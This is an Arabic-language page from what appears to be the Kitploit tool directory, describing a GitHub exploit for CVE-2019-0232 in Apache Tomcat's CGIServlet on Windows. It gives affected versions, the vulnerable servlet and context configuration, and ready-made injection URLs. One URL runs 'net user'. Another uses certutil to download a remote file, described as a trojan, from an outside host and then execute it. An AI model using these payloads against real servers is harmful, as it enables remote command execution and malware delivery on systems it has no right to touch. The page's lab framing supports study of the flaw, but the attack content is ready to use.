Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-0232-EXP | Kitploit
أدوات/GitHubGitHub/cyy95/cve-2019-0232-exp
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرة
GitHubcyy95/cve-2019-0232-exp

CVE-2019-0232-EXP

عرض المستودع
33منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-0232-EXP

بيئة الاختبار هي Win10 Home 1809، إصدار jre هو 18.3 (build 10.0.2+13)، إصدار Tomcat هو 9.0.13.

إصدارات Tomcat المتأثرة

★Apache Tomcat 9.0.0.M1 إلى 9.0.17
★Apache Tomcat 8.5.0 إلى 8.5.39
★Apache Tomcat 7.0.0 إلى 7.0.93

تكوين conf/web.xml

root@kitploit:~
<servlet>
    <servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
    <init-param>
      <param-name>cgiPathPrefix</param-name>
      <param-value>WEB-INF/cgi-bin</param-value>
    </init-param>
    <init-param>
      <param-name>enableCmdLineArguments</param-name>
      <param-value>true</param-value>
    </init-param>
    <init-param>
      <param-name>executable</param-name>
      <param-value></param-value>
    </init-param>
    <load-on-startup>5</load-on-startup>
</servlet>

تكوين تعيينات Servlet:

root@kitploit:~
<servlet-mapping>
        <servlet-name>cgi</servlet-name>
        <url-pattern>/cgi-bin/*</url-pattern>
</servlet-mapping>

تكوين conf/context.xml

أضف الخاصية privileged="true"

root@kitploit:~
<Context privileged="true">
   <WatchedResource>WEB-INF/web.xml</WatchedResource>
   <WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource>
   <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>
</Context>

أخيرًا، أنشئ ملفًا فارغًا hello.bat داخل مجلد webapps/ROOT/WEB-INF، ولا حاجة لكتابة أي شيء فيه. قم بتشغيل Tomcat، افتح المتصفح، وانتقل إلى الرابط التالي: http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5Cnet+user

اختبار الحقن

سيناريو استغلال الثغرة

أنشئ رابط حقن لتنفيذ وظيفة تنزيل صورة (حصان طروادة): http://localhost:8080/cgi-bin/hello.bat?&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3a%2f%2fb.hiphotos.baidu.com%2fimage%2fpic%2fitem%2f9825bc315c6034a8ef5250cec5134954082376c9.jpg+1.jpg+%26start+1.jpg

عارض تنزيل الصور

تنزيل الأداة